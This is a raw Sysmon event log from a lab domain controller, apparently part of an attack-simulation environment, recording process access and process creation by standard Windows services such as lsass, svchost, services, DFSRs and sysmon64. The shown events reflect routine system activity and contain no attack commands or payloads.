15:51:15.831{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001288Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.831{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001287Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.831{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001286Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.816{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-3000-000000008801}2696C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001285Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.816{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-3000-000000008801}2696C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001284Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.816{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C73-5FA1-3900-000000008801}3548C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001283Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.816{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3900-000000008801}3548C:\Windows\System32\vdsldr.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001282Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.824{D28789B6-7C73-5FA1-3900-000000008801}3548C:\Windows\System32\vdsldr.exe10.0.14393.0 (rs1_release.160715-1616)Virtual Disk Service LoaderMicrosoft® Windows® Operating SystemMicrosoft Corporationvdsldr.exeC:\Windows\System32\vdsldr.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=E5C3B321907C73E782280BE427599F14,SHA256=43F0AF018DC498619222CF16E1C9BDE2F7710732686DC361E4D692B7EFB4DDF9,IMPHASH=D6207B24445355CEA1AC6C8E9A2BA2B9{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001281Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.816{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001280Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.816{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001279Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.800{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001278Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.800{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001277Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.800{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001276Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.784{D28789B6-7C62-5FA1-0B00-000000008801}8683448C:\Windows\system32\lsass.exe{D28789B6-7C61-5FA1-0100-000000008801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+70fae|C:\Windows\system32\lsass.exe+3907|C:\Windows\SYSTEM32\ntdll.dll+803e4|C:\Windows\SYSTEM32\ntdll.dll+1e892|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001275Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.784{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001274Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.784{D28789B6-7C62-5FA1-0A00-000000008801}8522660C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001273Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.769{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C61-5FA1-0100-000000008801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001272Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.769{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C61-5FA1-0100-000000008801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001271Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.769{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001270Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.769{D28789B6-7C62-5FA1-0A00-000000008801}8521132C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001269Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.721{D28789B6-7C73-5FA1-3700-000000008801}3084C:\Windows\System32\dfsrs.exe10.0.14393.2879 (rs1_release_inmarket.190313-1855)Distributed File System ReplicationMicrosoft® Windows® Operating SystemMicrosoft Corporationdfsr.exeC:\Windows\system32\DFSRs.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=5043D2DBA1E5AC37A9874B403B48C1C1,SHA256=7044CE273B245F6D67A3BFC7D548CFF538F8FC3BD1C99467B5ADE6452C150313,IMPHASH=C1481566D7D03EEC4CC460B52429BA9C{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001268Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.769{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3800-000000008801}3268C:\Windows\system32\wbem\unsecapp.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001267Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.753{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C73-5FA1-3800-000000008801}3268C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001266Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.753{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3800-000000008801}3268C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001265Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.762{D28789B6-7C73-5FA1-3800-000000008801}3268C:\Windows\System32\wbem\unsecapp.exe10.0.14393.2515 (rs1_release_1.180830-1044)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=2E49BB6C9F6599F518FE30BE2F000247,SHA256=20F499D581CF4AF331D8EC8B1E07A32CC1A695EF6790B51DA5EE223C5867154F,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001264Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.753{D28789B6-7C62-5FA1-0A00-000000008801}8522660C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3400-000000008801}2168C:\Windows\system32\dns.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001263Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.753{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001262Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 